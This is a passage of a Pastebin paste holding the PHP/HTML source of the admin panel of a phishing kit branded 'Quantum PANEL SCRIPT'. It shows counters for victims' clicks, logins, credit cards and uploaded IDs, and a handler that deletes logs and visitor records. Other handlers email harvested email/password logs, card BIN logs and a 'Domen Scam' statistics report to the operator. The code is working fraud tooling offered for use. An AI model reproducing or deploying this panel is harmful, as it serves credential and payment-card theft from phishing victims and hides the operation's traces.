  873. <input class="col-lg-5 control-label" type="text" name="otab" placeholder="block / non"></input>
  874. <input type="submit" class="btn btn-primary control-label" name="otas" value="Save"></input>
  875. <br>
  876. <center><br>
  877. <form method="POST">
  878. <div class="klik">Click : <font color="blue"><?php echo empty(@file_get_contents("assets/logs/._click_.txt")) ? "0" : @file_get_contents("assets/logs/._click_.txt"); ?></font></div>
  879.  
  880. <div class="klik">Login : <font color="orange"><?php echo empty(@file_get_contents("assets/logs/._login_.txt")) ? "0" : @file_get_contents("assets/logs/._login_.txt"); ?></font></div>
  881.  
  882. <div class="klik">Credit Card : <font color="yellow"><?php echo empty(@file_get_contents("creditcard.txt")) ? "0" : @file_get_contents("creditcard.txt"); ?></font></div>
  883.  
  884. <div class="klik">Upluad ID : <font color="red"><?php echo empty(@file_get_contents("poto.txt")) ? "0" : @file_get_contents("poto.txt"); ?></font></div>
  885. </form>
  886. </div>
  887. </div>
  888.  
  889.  
  890.  
  891. </div>
  892.  
  893. </div>
  894. <?php
  895. @unlink("set.php");
  896.  
  897. $lama = trim(@$_POST['lama']);
  898. $baru = trim(@$_POST['baru']);
  899. $keylama = trim(@$_POST['keylama']);
  900. $keybaru = trim(@$_POST['keybaru']);
  901. $parla = trim(@$_POST['parla']);
  902. $parba = trim(@$_POST['parba']);
  903. $ual = trim(@$_POST['ual']);
  904. $uab = trim(@$_POST['uab']);
  905. $tll = trim(@$_POST['tll']);
  906. $tlb = trim(@$_POST['tlb']);
  907. $otal = trim(@$_POST['otal']);
  908. $otab = trim(@$_POST['otab']);
  909. $file = "setting.php";
  910. $isi = @file_get_contents($file);
  911.  
  912. if(isset($_POST['email'])) {
  913. if(@preg_match("#\b$lama\b#is", $isi)) {
  914. $isi = str_replace($lama,$baru,$isi);
  915. $buka = @fopen($file,'w');
  916. @fwrite($buka,$isi);
  917. fclose($buka);
  918.  
  919. echo "<script>alert('Success')</script>";
  920. echo "<meta http-equiv='refresh' content='0; url=#ganti_email'/>";
  921. }
  922. else
  923. echo "<script>alert('Failed')</script>";
  924. }
  925. else if(isset($_POST['key'])) {
  926. if(@preg_match("#\b$keylama\b#is", $isi)) {
  927. $isi = str_replace($keylama,$keybaru,$isi);
  928. $buka = @fopen($file,'w');
  929. @fwrite($buka,$isi);
  930. fclose($buka);
  931.  
  932. echo "<script>alert('Success')</script>";
  933.  
  934. }
  935. else
  936. echo "<script>alert('Failed')</script>";
  937. }else if(isset($_POST['usas'])) {
  938. if(@preg_match("#$ual#is", $isi)) {
  939. $isi = str_replace($ual,$uab,$isi);
  940. $buka = @fopen($file,'w');
  941. @fwrite($buka,$isi);
  942. fclose($buka);
  943. echo "<script>alert('Success')</script>";
  944. echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
  945. echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
  946. }
  947. else
  948. echo "<script>alert('Failed')</script>";
  949. }else if(isset($_POST['param'])) {
  950. if(@preg_match("#param = \"$parla\"#is", $isi)) {
  951. $isi = str_replace("$parla\"; // Parameter Redirect","$parba\"; // Parameter Redirect",$isi);
  952. $buka = @fopen($file,'w');
  953. @fwrite($buka,$isi);
  954. fclose($buka);
  955.  
  956. @rename($parla.".php",$parba.".php");
  957.  
  958. echo "<script>alert('Success')</script>";
  959. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  960. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  961. }
  962. else
  963. echo "<script>alert('Failed')</script>";
  964. }else if(isset($_POST['tls'])) {
  965. if(@preg_match("#$tll#is", $isi)) {
  966. $isi = str_replace($tll,$tlb,$isi);
  967. $buka = @fopen($file,'w');
  968. @fwrite($buka,$isi);
  969. fclose($buka);
  970. echo "<script>alert('Success')</script>";
  971. echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
  972. echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
  973. }
  974. else
  975. echo "<script>alert('Failed')</script>";
  976. }else if(isset($_POST['otas'])) {
  977. if(@preg_match("#$otal#is", $isi)) {
  978. $isi = str_replace($otal,$otab,$isi);
  979. $buka = @fopen($file,'w');
  980. @fwrite($buka,$isi);
  981. fclose($buka);
  982. echo "<script>alert('Success')</script>";
  983. echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
  984. echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
  985. }
  986. else
  987. echo "<script>alert('Failed')</script>";
  988. }
  989. else if(isset($_POST['rd'])) {
  990. @unlink("._no_.txt");
  991. @unlink("._nob_.txt");
  992. @unlink("assets/logs/._click_.txt");
  993. @unlink("assets/logs/._loginz_.txt");
  994. @unlink("assets/logs/._ccz_.txt");
  995. @unlink("._logz_.txt");
  996. @unlink("assets/logs/bxp.log");
  997. @unlink("assets/logs/bin.log");
  998. @unlink("error_log");
  999. @unlink("._ssid.txt");
  1000. // @unlink("assets/includes/blacklist.dat");
  1001. @unlink("assets/logs/accepted_visitors.txt");
  1002. @unlink("assets/logs/ip2_log.txt");
  1003. @unlink("assets/logs/denied_visitors.txt");
  1004. @unlink("assets/logs/visitor_logged_in.txt");
  1005.  
  1006. $filee = @file_get_contents("assets/includes/blacklist.dat");
  1007. $cek = preg_match_all("/# NETCRAFT IP RANGES(.*)# USERS COMPLETED/is", $filee, $res) ? $res : null;
  1008. $buka = @fopen("assets/includes/blacklist.dat",'w');
  1009. @fwrite($buka,$cek[0][0]."\r\r");
  1010. @fclose($buka);
  1011.  
  1012. echo "<script>alert('Success')</script>";
  1013. echo "<meta http-equiv='refresh' content='0; url=#reset_data'/>";
  1014. }
  1015. else if(isset($_POST['sd'])) {
  1016. $empass = @file_get_contents("assets/logs/bxp.log");
  1017. $total = substr_count($empass,"@");
  1018.  
  1019. if($total <= 0)
  1020. {
  1021. echo '<script>alert("Failed\n\Email And Password Not Found.")</script>';
  1022. }
  1023. else
  1024. {
  1025. $fil = "._no_.txt";
  1026. $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  1027. $urut = fopen($fil,"w");
  1028. fwrite($urut,$last+1);
  1029. fclose($urut);
  1030.  
  1031. $headers = "From: Empas Apel <empas@Quantum-panel.team>\r\n";
  1032. $headers .= "Reply-to: Quantum-panel@team\r\n";
  1033. $headers .= "MIME-Version: 1.0\r\n";
  1034. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  1035. $subj = "[ Empas #$last ] [ Total $total Lines ] [ ".date("D, d-F-y H:i")." ]";
  1036. $to = $Your_Email;
  1037. $data = "-===================== Quantum PANEL SCRIPT =====================-
  1038.  
  1039. -----------------------------------------------------------------
  1040. $empass
  1041. -----------------------------------------------------------------";
  1042.  
  1043. @mail($to, $subj, $data, $headers);
  1044.  
  1045. echo "<script>alert('Success')</script>";
  1046. echo "<meta http-equiv='refresh' content='0; url=#send_empas'/>";
  1047. }
  1048. }
  1049. else if(isset($_POST['sb'])) {
  1050. $binbin = @file_get_contents("asset/logs/bin.log");
  1051. $total = substr_count($binbin,"[");
  1052.  
  1053. if($total <= 0)
  1054. {
  1055. echo '<script>alert("Failed~\n\nBIN Not Found.")</script>';
  1056. }
  1057. else
  1058. {
  1059. $fil = "._nob_.txt";
  1060. $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  1061. $urut = fopen($fil,"w");
  1062. fwrite($urut,$last+1);
  1063. fclose($urut);
  1064.  
  1065. $headers = "From: Bin Colletions <bin@Quantum-panel.team>\r\n";
  1066. $headers .= "Reply-to: Quantum@panel.team\r\n";
  1067. $headers .= "MIME-Version: 1.0\r\n";
  1068. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  1069. $subj = "[ Bin #$last ] [ Total $total Cards ] [ ".date("D, d-F-y H:i")." ]";
  1070. $to = $Your_Email;
  1071. $data = "-===================== Quantum PANEL SCRIPT =====================-
  1072.  
  1073. -----------------------------------------------------------------
  1074. $binbin
  1075. -----------------------------------------------------------------";
  1076.  
  1077. @mail($to, $subj, $data, $headers);
  1078.  
  1079. echo "<script>alert('Success')</script>";
  1080. echo "<meta http-equiv='refresh' content='0; url=#send_bin'/>";
  1081. }
  1082. }
  1083. else if(isset($_POST['sl'])) {
  1084. $fil2 = "._logz_.txt";
  1085. $lasts = (@file_get_contents($fil2) == "" ? "1" : @file_get_contents($fil2));
  1086. $urut = fopen($fil2,"w");
  1087. fwrite($urut,$lasts+1);
  1088. fclose($urut);
  1089.  
  1090. $headers = "From: Quantum PANEL SCRIPT Report <report@Quantum-panel.TEAM>\r\n";
  1091. $headers .= "Reply-to: Quantum@panel.team\r\n";
  1092. $headers .= "MIME-Version: 1.0\r\n";
  1093. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  1094. $subj = "[ Report #$lasts ] [ QUANTUM KING TEAM ] [ ".date("D, d-F-y H:i")." ]";
  1095. $to = $Your_Email;
  1096. $tor = $tglorder;
  1097. $tcl = (@file_get_contents("assets/logs/._click_.txt") == "" ? "0" : @file_get_contents("assets/logs/._click_.txt"));
  1098. $tlo = (@file_get_contents("assets/logs/._loginz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._loginz_.txt"));
  1099. $tcc = (@file_get_contents("assets/logs/._ccz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._ccz_.txt"));
  1100. $tlh = substr_count(@file_get_contents("._ssid.txt")," ");
  1101. $det = array("u" => $_SERVER['SERVER_NAME'],"p" => $_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"],"m" => $umurlog,"tc" => $tcl,"tl" => $tlo,"tcc" => $tcc,"lh" => $tlh);
  1102. $data = "
  1103. -===================== Quantum PANEL SCRIPT =====================-
  1104. # Domen Scam : ".$det['u']."
  1105. # Panel Scam : ".$det['p']."
  1106. # Umur Scam : ".$det['m']." hari
  1107. # Tanggal Order : ".$tor."
  1108. # Total Load : ".$det['lh']."
  1109. # Total Klik : ".$det['tc']."
  1110. # Total Login : ".$det['tl']."
  1111. # Total Card : ".$det['tcc']."
  1112. -===================== Quantum PANEL SCRIPT =====================-";
  1113.  
  1114. @mail($to, $subj, $data, $headers);
  1115.  
  1116. echo "<script>alert('Success')</script>";
  1117. echo "<meta http-equiv='refresh' content='0; url=#send_report'/>";
  1118. }
  1119. ?>
  1120. <div class="row tall-row">
  1121. <div class="col-md-12">
  1122. <p>Created by <a https://www.facebook.com/jean.tirstan.3">JEAN TIRSTAN</a> &copy; 2018</p>
  1123. </div>
  1124. </div>
  1125. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
  1126. <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
  1127.  
  1128. </body>
  1129. </html>
  1130.  
  1131.  
  1132.  
  1133.  
  1134.  
  1135. </body>
  1136. </html>
  1137.  
  1138. Pastebin PRO SPRING Special!
  1139. Get 40% OFF Pastebin PRO accounts!
  1140.  
  1141. create new paste / dealsnew! / api / scraping api / trends / syntax languages / archive / faq / tools / go
  1142. privacy statement / cookies policy / terms of service / security disclosure / dmca / contact
  1143.  
  1144. By using Pastebin.com you agree to our cookies policy to enhance your experience.
  1145. Site design & logo © 2018 Pastebin; user contributions (pastes) licensed under cc by-sa 3.0 -- Dedicated Server Hosting by Steadfast
  1146.  
  1147. Top
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement